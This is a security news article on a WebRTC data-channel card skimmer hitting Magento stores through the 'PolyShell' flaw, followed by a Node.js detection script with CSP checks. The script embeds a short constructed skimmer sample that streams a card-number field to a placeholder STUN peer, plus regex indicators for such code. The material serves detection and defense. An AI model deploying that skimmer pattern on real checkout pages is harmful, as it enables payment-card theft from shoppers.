Sansec researchers have identified a payment skimmer that uses WebRTC data channels to deliver its malicious payload and exfiltrate stolen card data. A data channel is a peer-to-peer transport rather than an HTTP request, so it falls outside the traffic that a Content Security Policy's connect-src directive governs; the skimmer therefore slips past a control that sites deploy precisely to stop unauthorized outbound connections from the page.
A recent wave of attacks on e-commerce platforms uses this technique to steal credit card data. Unlike traditional skimmers, which exfiltrate over ordinary web requests (fetch, XMLHttpRequest, image beacons or WebSockets), this malware sets up a WebRTC connection to an attacker-controlled peer and opens a data channel over it. Through that channel the attackers push additional malicious code into the page and smuggle stolen data out. The traffic is carried as SCTP over DTLS on UDP rather than as HTTP(S): it is encrypted end to end, it is not subject to the CSP rules most sites rely on to prevent data leaks, and it frequently passes unnoticed by network monitoring that is tuned for web traffic.
The initial breach is often made possible by a critical vulnerability known as PolyShell, which affects Magento and Adobe Commerce. The flaw lets an attacker bypass authentication and upload arbitrary files to the web server through the application's API. Sansec has observed a sharp rise in scanning for this vulnerability, with over half of susceptible online stores already showing signs of attempted or successful exploitation: a rapid transition from disclosure of the flaw to active, widespread use by multiple groups.
Once the attackers gain access, they inject a script that connects to a specific remote server. That connection acts as a private tunnel: the skimmer receives its instructions over it and sends back the payment details customers type into the checkout form. Because the channel runs on a non-standard port and is DTLS-encrypted, the stolen data is shielded from inspection in transit. This is a significant challenge for defenders. A site with a strict CSP that locks connect-src down to its own origin is still exposed, because that directive does not apply to WebRTC peer connections; CSP Level 3 defines a separate webrtc directive that can block peer connections outright, but it only helps where the browser honours it and the site actually deploys it.
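To make the detection side concrete, the following Node.js script is an added example, not code from the Sansec write-up and not the skimmer itself. It scans page scripts for the WebRTC calls a data-channel skimmer needs (RTCPeerConnection, createDataChannel, setRemoteDescription, STUN/TURN URLs) alongside checkout-form hooks, and parses a CSP header to report whether connect-src is locked down while peer connections remain unrestricted. The sample scripts and CSP headers are constructed, and the indicator regexes and verdict thresholds are this example's own assumptions.

```javascript
// Added example (not from the Sansec write-up): static indicators of a
// WebRTC data-channel skimmer in page scripts, plus a check of whether a
// site's CSP would constrain it. Sample scripts and headers are constructed.

const WEBRTC_INDICATORS = [
  { name: 'peer-connection', re: /\bRTCPeerConnection\b/ },
  { name: 'data-channel',    re: /\.createDataChannel\s*\(/ },
  { name: 'remote-sdp',      re: /\.setRemoteDescription\s*\(/ },
  { name: 'ice-candidate',   re: /\bRTCIceCandidate\b|\.addIceCandidate\s*\(/ },
  { name: 'stun-turn-url',   re: /\b(?:stun|turn)s?:[^\s'"]+/i },
];

// Hooks a skimmer needs in order to read card data before it leaves the form.
const PAYMENT_INDICATORS = [
  { name: 'card-field', re: /\b(?:cc[_-]?number|card[_-]?number|cvv|cvc|expir)/i },
  { name: 'form-hook',  re: /addEventListener\s*\(\s*['"](?:submit|input|change|keyup)['"]/ },
];

// Classify one script. WebRTC alone is legitimate on video/chat pages, so only
// a data channel combined with card-field access is escalated to "suspicious";
// any other WebRTC use on a checkout page is flagged for human review.
function scanScript(name, src) {
  const webrtc = WEBRTC_INDICATORS.filter((i) => i.re.test(src)).map((i) => i.name);
  const payment = PAYMENT_INDICATORS.filter((i) => i.re.test(src)).map((i) => i.name);
  let verdict = 'clean';
  if (webrtc.length > 0) verdict = 'review';
  if (webrtc.includes('data-channel') && payment.length > 0) verdict = 'suspicious';
  return { name, webrtc, payment, verdict };
}

// Minimal CSP parser: "directive value value; directive value" -> object.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

// connect-src governs fetch/XHR/WebSocket/EventSource, not RTCPeerConnection.
// CSP Level 3 defines a separate `webrtc` directive ('allow' | 'block'); only
// that directive, where the browser honours it, stops a data-channel skimmer.
function cspCoversWebrtc(header) {
  const d = parseCsp(header);
  const connect = d['connect-src'] || [];
  return {
    connectSrcRestricted: connect.length > 0 && !connect.includes('*'),
    webrtcBlocked: (d['webrtc'] || []).includes("'block'"),
  };
}

// Constructed samples (not real skimmer code).
const SAMPLE_SCRIPTS = {
  skimmer: `
    const pc = new RTCPeerConnection({ iceServers: [{ urls: 'stun:stun.example.invalid:3478' }] });
    const ch = pc.createDataChannel('x');
    document.querySelector('#cc_number').addEventListener('change', (e) => ch.send(e.target.value));
    pc.setRemoteDescription(offer);`,
  videoChat: `
    const pc = new RTCPeerConnection();
    navigator.mediaDevices.getUserMedia({ video: true }).then((s) => s.getTracks().forEach((t) => pc.addTrack(t, s)));`,
  checkout: `
    document.querySelector('#cc_number').addEventListener('input', validate);
    fetch('/rest/V1/payment', { method: 'POST', body: JSON.stringify(data) });`,
};

const SAMPLE_CSP_STRICT = "default-src 'self'; connect-src 'self' https://api.example.invalid; script-src 'self'";
const SAMPLE_CSP_WEBRTC = "default-src 'self'; connect-src 'self'; webrtc 'block'";

function runDemo() {
  const scripts = Object.entries(SAMPLE_SCRIPTS).map(([n, s]) => scanScript(n, s));
  const csp = { strict: cspCoversWebrtc(SAMPLE_CSP_STRICT), withWebrtc: cspCoversWebrtc(SAMPLE_CSP_WEBRTC) };
  return { scripts, csp };
}

for (const r of runDemo().scripts) {
  console.log(`${r.name}: ${r.verdict} webrtc=[${r.webrtc}] payment=[${r.payment}]`);
}
```

Run it against the JavaScript actually served on your checkout pages (inline scripts included), not just your own repository, since the injected script is what needs to be found. The strict sample CSP restricts connect-src yet leaves webrtcBlocked false, which is exactly the gap the skimmer exploits.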
Although a fix for the underlying PolyShell vulnerability has been developed, so far it has shipped mainly in pre-release (beta) builds and has not yet reached all production releases. That delay leaves many online retailers exposed while they wait for stable updates to be finalized and deployed. In the meantime, the speed of exploitation suggests that attackers are using the window to the full across a variety of industries, including the automotive sector.
Until official patches are available, administrators are urged to manually restrict the server directories where attackers typically drop their files, for example by denying execution of server-side scripts in directories meant only for uploads and cached assets, and to tighten file upload permissions. Store owners should also perform deep scans of their environments for backdoors or hidden scripts planted during the initial wave of attacks, and keep close watch on server activity, since a site may already have been compromised before the patch is applied.
Source: https://sansec.io/research/webrtc-skimmer



